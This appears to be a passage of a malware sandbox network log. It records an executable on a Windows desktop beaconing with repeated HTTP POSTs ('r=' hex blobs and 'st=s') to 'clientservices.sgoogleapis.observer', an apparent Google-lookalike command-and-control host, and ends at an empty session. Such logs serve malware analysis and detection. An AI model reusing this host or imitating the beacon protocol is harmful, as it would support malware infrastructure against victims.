Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49959	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:51.924940109 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:52.579974890 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1PCATpZVcXapcs1mUgjDyhBaq6i2Z1b2TBlcQ8J2hRFmX4GctpRgnH1iQ8ff8FEc8evo%2BAeQ42rERpEjBKpO1UDVGAqbNfwGoLWp0LIeQdie462J%2FwHSeTDBmBVaKHdQbW668hvKDUYIzfbchm5L7p6H1DqWA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90972bca43ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49975	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:54.219134092 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:54.864738941 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Df7XMAMizzkqZFiFVwRZ7nsodpuPilY2uKicIB4PkkfZvIGxq8Kl8wYOh1lP2aAo8LLJNwNyqXwvgdenJUlKLh3N3n8vE5ludp5yEpntGSqHT%2FQSLkFCdWnrG4s%2BL9xDBTpsrIENxqGEwSXtmF0I%2Fbv1G6fRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90a57cd343ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49990	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:56.405364037 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:44:57.035424948 CET	832	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyMu8OHRSw3j%2FShBdrcEhnuB%2FxfNp0bnMXdU6O3zQviMJStes2j84sbMbQ%2BoQTohQi%2BtctTtaX%2FT4AukW5f4qrHn96ZRMk88f4Hw%2BKT5iBjXAvCbS9wDnjqD7nIAzjiBrY%2FZY%2FxH5epKR8gNgVQiXqfkCNvMAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90b30ba98c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2131&min_rtt=2131&rtt_var=1065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50003	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:44:58.669764042 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:44:59.313751936 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:44:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhBi3ChooyeM7UJMqi6E0j9y7L93K6uqiDrSsBuyyF3Jme3Vrs95%2FMlaJQumk8hQzAcd4WOznZXmZUcIR15z0qF%2FmOPrFwW0X2miHa9JR9X7yjrDoEeMArh%2FEdVKrBQVIZWa%2F4I9iomEyQ47SZNbMX78oOa77w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90c14ea543ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50004	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:00.824453115 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:01.557617903 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nL0mEBvg6KDfWMI%2B7gC9b922cit065oHZ1XsB%2Bv2I4mcHtJG%2BwFA7ShkiyAwt9ir%2FVmrvCIFXOgMuYaIy1gWj7PVVjgI07oi8oeUz3SwDGqFih%2BnoZqY5UyJAB9zw7q8MxqamlSnDzEiMBHf7T6uRgG7he2FyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90cecce30f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50005	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:03.186043024 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:03.832396030 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6IfdyZYBqJ3iTj4%2FHTqVNu%2BnlyJeCOq9fVJulUOrRmZ4iAmhhOMgwewLsK%2FN6Hqw3VnV1KT57rxZDFjBy4LWfgv9S6LDy3WcONQu4SJaGfSJJSjsjfYUVrbTp9MXNQlR9qlFCHaoS5hZ0iOcYtp2%2BvNUu39DLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90dd8de742d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1510&rtt_var=755&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50006	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:05.341713905 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:05.896019936 CET	820	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FoyIWXJl7MW3yFK8kW4vag6lRbnzXAQ73Q7aL9i%2BHCw6oefslebUPWJyLtTfH7bn5V5JUpc5VJGb%2FEQSI42uOrVIRGbbLBIpSjL1cK3x74hNvIcaonlAQb%2B1HOjGmsryRPrQPNLFl9lpaWX8EzR5voJ%2BhPITA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90eaeddd42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Jan 8, 2025 08:45:06.023324013 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50007	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:07.654402971 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:08.286063910 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4T8a8CU1AOLzw3MhuA1JnZJ%2BI9y%2BcBjdmNhhywqNW%2B9sHWnTCU9e7vOHyzG05N4e%2B2QBVfMkJHhADzcvoRL2Kv9D6o7mh6MLTzQxkfYNVp69Tz36Mv%2F3Gq%2F7VdOfYm66n2f0P4pvOgbvPwNIZTTs4rdVzzvkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea90f95c5ac443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=783&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50008	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:09.795150995 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:10.456854105 CET	825	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lgd%2BNenlWth%2FsV0KndY38BCAUcYnm5UXwMPd4yxnQNkNzilnTdo0F6O7v8tFMqMzDmGKk%2B2WZRzASL3V2bpfNiPiUPcLwWaXwHw2kn9rGu8ivdGc0yAeB78SeY%2FXiTL6OVVBrWyJTisKgIoieJPOR55i%2Bbs6BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9106dced7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50009	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:12.091746092 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:12.721060038 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnsiWIyFl%2Bv27EKJ2HhK44UTJf9XXA%2BjJ1OLPAOjgbZRCGxYWIxLq0WvHrOwXNmq3lSBICBrC54jeG1xmoRXZwI8EEiJaQodCHcYa9QxY%2FiydKPG9DS%2BlbUm9qC7jyDmgYGBpnxujS2Ybz4tWyBP4wzdTE0EMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91151e7cc443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1607&rtt_var=803&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50010	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:14.232621908 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:14.884509087 CET	831	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ecy%2FpyRmFP7GMS4BP9cJmLZtEt7FRYsrczAoD3MklLef5%2F02ZaOxGIW6ThT20EU3KwMT9T6nhfOV734cGjeORh%2B3rNWs%2B3eH7LlKgkb3Drg%2Bfol239STzZQo7s4A2xyPAyOeTna9%2FtSC%2BmyDi7kK%2FEWs9Bbftg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91228af042d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50011	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:16.514049053 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:17.157099009 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=baWOKMSzc7%2BkO%2FgE1rqv58PkWErBAsUNiXftwjhR%2F0XQvtWWIzGl61MH9k9arNb5zjPtRFTllN6C0R01oAh2wObx6R2QAGfiUb%2Bg7uCSZJ41YVCNil558tfmWRDG2CsMB8nKRGFePiTtZITF%2F0go1bECUOU6wA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9130decbc443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50012	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:18.669969082 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:19.300968885 CET	819	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5DkSa0wAH8zp7bwycqFg4pAS6AfSWbXXKlc2J4TAxPVAeZEar8GZEvwoePqz9zYTHGTINcIv5TbV9rgt4eIEB9vZC%2F3Rv9q%2B3k5ndO8OHidxaAclLeWCa1oEtz4MahoBQZUF4Jm5Tzi3xp6Sn8KsX1m2SI7bsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea913e3f29c443-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50013	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:20.936687946 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:21.567949057 CET	816	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USaIXIgFx7dn91BqlNl93kbZAWrzPz%2FkzfFLwoLVxk3iIf8m0MPG9G9dCAaM88ajZeWgFS3zJJ2GNXIZneuvMrX9c8Chy%2Bjx1epck6WZG4%2BLs4Stli6RosMa5gMQLPVspbJAKy2D23VwfIiPavrc8LyRg3gnCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea914c5e858c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2042&rtt_var=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50014	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
